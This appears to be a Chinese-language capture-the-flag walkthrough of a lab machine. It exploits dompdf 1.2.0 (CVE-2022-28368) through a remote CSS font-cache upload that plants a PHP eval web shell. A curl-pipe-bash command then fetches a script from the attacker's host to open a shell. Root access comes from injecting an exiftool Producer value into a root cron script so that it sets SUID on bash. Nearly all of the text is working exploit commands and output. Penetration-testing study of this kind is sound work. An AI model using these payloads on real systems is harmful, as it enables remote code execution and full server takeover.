本题考察:CVE-2022-28368
CVE-2022-28368 - 通过远程 CSS 字体缓存安装的 RCE
参考:
dompdf-rce/exploit
cd /tmp;
git clone https://github.com/positive-security/dompdf-rce
cd dompdf-rce;
cd /tmp/dompdf-rce/exploit/;
cat exploit.css
sed -i "s/localhost:9001/10.10.14.53/g" exploit.css;
cp exploit_font.php exploit_font.php.bak;
sed -i "s|\(<?php phpinfo(); ?>\)|<?php eval(\$_POST[2]);|g" exploit_font.php;
tail exploit_font.php;
cd /tmp/dompdf-rce/exploit/;
python -m http.server 80 & 接下来发post包(win10 x64 cmd下):
注意^< 和 ^>做了转义
-x 是走BurpSuite的http8080代理,不需要走代理可以删除.
curl -v -x http://127.0.0.1:8080 -d "{\"html\": \"title=^<link rel=stylesheet href='http://10.10.14.53/exploit.css'^>\"}" "http://prd.m.rendering-api.interface.htb/api/html2pdf"计算md5:
echo -n "http://10.10.14.53/exploit_font.php" | md5sum
ae6cfa0a356a3b98582afa39ee67bf43 -最后反弹shell:
curl -v -x http://127.0.0.1:8080 -d "2=system('curl+10.10.14.53:30088/ccc.sh|bash');" http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_ae6cfa0a356a3b98582afa39ee67bf43.php路径要注意:
/vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_ae6cfa0a356a3b98582afa39ee67bf43.php
接下来提权:
bash-4.4$ grep bash /etc/passwd;
root:x:0:0:root:/root:/bin/bash
dev:x:1000:1000:,,,:/home/dev:/bin/bash
bash-4.4$
上传pspy64工具到靶机,运行看一下进程。
发现了一个root权限运行的,访问用户的sh文件,很可疑
2023/05/20 10:41:25 CMD: UID=0 PID=1 | /sbin/init maybe-ubiquity
2023/05/20 10:42:01 CMD: UID=0 PID=33487 | /bin/bash /usr/local/sbin/cleancache.sh
2023/05/20 10:42:01 CMD: UID=0 PID=33486 | /bin/sh -c /usr/local/sbin/cleancache.sh
2023/05/20 10:42:01 CMD: UID=0 PID=33485 | /usr/sbin/CRON -f
2023/05/20 10:42:01 CMD: UID=0 PID=33490 | /bin/bash /usr/local/sbin/cleancache.sh
2023/05/20 10:42:01 CMD: UID=0 PID=33489 | /bin/bash /usr/local/sbin/cleancache.sh
2023/05/20 10:42:01 CMD: UID=0 PID=33488 | /bin/bash /usr/local/sbin/cleancache.sh
2023/05/20 10:42:01 CMD: UID=0 PID=33491 |
2023/05/20 10:42:01 CMD: UID=0 PID=33492 | /bin/bash /usr/local/sbin/cleancache.sh
2023/05/20 10:42:01 CMD: UID=0 PID=33494 | /bin/bash /usr/local/sbin/cleancache.sh
2023/05/20 10:42:01 CMD: UID=0 PID=33493 | /usr/bin/perl -w /usr/bin/exiftool -s -s -s -Producer /tmp/test_original
2023/05/20 10:42:01 CMD: UID=0 PID=33497 | /bin/bash /usr/local/sbin/cleancache.sh
2023/05/20 10:42:01 CMD: UID=0 PID=33496 | /usr/bin/perl -w /usr/bin/exiftool -s -s -s -Producer /tmp/yyxx
2023/05/20 10:42:01 CMD: UID=0 PID=33495 | /bin/bash /usr/local/sbin/cleancache.sh
ls -al /usr/local/sbin/cleancache.sh ;
cat /usr/local/sbin/cleancache.sh ;
#! /bin/bash
cache_directory="/tmp"
for cfile in "$cache_directory"/*; do
if [[ -f "$cfile" ]]; then
meta_producer=$(/usr/bin/exiftool -s -s -s -Producer "$cfile" 2>/dev/null | cut -d " " -f1)
if [[ "$meta_producer" -eq "dompdf" ]]; then
echo "Removing $cfile"
rm "$cfile"
fi
fi
done
cat <<EOF>/tmp/.xxyy.sh
#!/bin/bash
id>/tmp/.iidd123;
chattr +a /tmp/.iidd123;
chmod +s /bin/bash;
EOF
chmod +x /tmp/.xxyy.sh;
chattr +a /tmp/.xxyy.sh;
touch /tmp/.yy22;
/usr/bin/exiftool -Producer='a[$(/tmp/.xxyy.sh>&2)]+42' /tmp/.yy22;
ln -s /tmp/.yy22 /tmp/yy22;
# /usr/bin/exiftool -s -s -s -Producer /tmp/.yy22
# /usr/bin/exiftool -s -s -s -Producer /tmp/.yy22 2>/dev/null | cut -d " " -f1<pdf:Producer>x[$(touch /tmp/0xdf)]</pdf:Producer>
bash-4.4$ /usr/bin/exiftool -s -s -s -Producer /tmp/test_original
x[$(touch /tmp/0xdf)]
bash-4.4$
实际上是if里触发执行的,测试命令如下:
meta_producer=$(echo "a[\$(/tmp/.xxyy.sh>&2)]+4");
echo "$meta_producer";
if [[ "$meta_producer" -eq "dompdf" ]]; then
echo "Removing 123123"
fi最后bash -p:
bash-4.4# cat /root/root.txt
02246920fd2785965ecf72ecaa22d8f3
bash-4.4#
bash-4.4# cat /home/dev/user.txt
f8e3acc434850f1527f6860f4b1222eb
bash-4.4# 事后:
# id
uid=0(root) gid=0(root) groups=0(root)
# crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command
*/2 * * * * /usr/local/sbin/cleancache.sh
*/5 * * * * /root/clean.sh
#
# bash
root@interface:/tmp# cat /root/clean.sh
#! /bin/bash
find /var/www/api/vendor/dompdf/dompdf/lib/fonts/ -type f -cmin -5 -exec rm {} \;
cp /root/font_cache/dompdf_font_family_cache.php.bak /root/font_cache/dompdf_font_family_cache.php
chown www-data /root/font_cache/dompdf_font_family_cache.php
chgrp www-data /root/font_cache/dompdf_font_family_cache.php
mv /root/font_cache/dompdf_font_family_cache.php /var/www/api/vendor/dompdf/dompdf/lib/fonts/dompdf_font_family_cache.php
root@interface:/tmp#
root@interface:/tmp# uname -a
Linux interface 4.15.0-202-generic #213-Ubuntu SMP Thu Jan 5 19:19:12 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
root@interface:/tmp# cat /etc/os-release
NAME="Ubuntu"
VERSION="18.04.6 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.6 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic
root@interface:/tmp# free -h
total used free shared buff/cache available
Mem: 1.9G 233M 690M 14M 1.0G 1.5G
Swap: 1.0G 0B 1.0G
root@interface:/tmp#
root@interface:/var/www/html# cat /var/www/api/vendor/dompdf/dompdf/VERSION;
1.2.0
root@interface:/var/www/html#
bash-4.4$ cat /var/www/api/composer.json;
{
"require": {
"bramus/router": "~1.6",
"dompdf/dompdf": "1.2.0"
}
}
bash-4.4$
可参考文章:
CTF_challenges/MRCTF2022/tprint at main · Snakinya/CTF_challenges · GitHub